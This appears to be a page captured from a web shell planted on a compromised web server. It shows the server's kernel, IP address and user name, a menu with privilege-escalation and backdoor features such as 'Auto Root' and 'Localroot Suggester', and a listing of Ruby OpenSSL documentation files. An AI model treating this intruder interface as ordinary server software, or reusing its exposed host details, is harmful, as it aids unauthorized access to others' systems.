Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ri /
system /
OpenSSL /
PKey /
Delete
Unzip
Name
Size
Permission
Date
Action
DH
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
DHError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
DSA
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
DSAError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
EC
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
ECError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
PKey
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
PKeyError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
RSA
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
RSAError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
cdesc-PKey.ri
3.82
KB
-rw-r--r--
2026-04-07 17:42
generate_key-c.ri
1.19
KB
-rw-r--r--
2026-04-07 17:42
generate_parameters-c.ri
1.21
KB
-rw-r--r--
2026-04-07 17:42
read-c.ri
1016
B
-rw-r--r--
2026-04-07 17:42
Save
Rename
U:RDoc::AnyMethod[iI"generate_key:ETI" OpenSSL::PKey::generate_key;TT:privateo:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I" Generates a new key (pair).;To:RDoc::Markup::BlankLine o; ; [ I"OIf a String is given as the first argument, it generates a new random key ;TI"Qfor the algorithm specified by the name just as ::generate_parameters does. ;TI"OIf an OpenSSL::PKey::PKey is given instead, it generates a new random key ;TI"Nfor the same algorithm as the key, using the parameters the key contains.;T@o; ; [I"PSee ::generate_parameters for the details of _options_ and the given block.;T@S:RDoc::Markup::Heading: leveli: textI"Example;To:RDoc::Markup::Verbatim; [ I"Ypkey_params = OpenSSL::PKey.generate_parameters("DSA", "dsa_paramgen_bits" => 2048) ;TI""pkey_params.priv_key #=> nil ;TI"4pkey = OpenSSL::PKey.generate_key(pkey_params) ;TI",pkey.priv_key #=> #<OpenSSL::BN 6277...;T:@format0: @fileI"ext/openssl/ossl_pkey.c;T:0@omit_headings_from_table_of_contents_below0I"tOpenSSL::PKey.generate_key(algo_name [, options]) -> pkey OpenSSL::PKey.generate_key(pkey [, options]) -> pkey ;T0[ I"(*args);T@ FI" PKey;TcRDoc::NormalModule00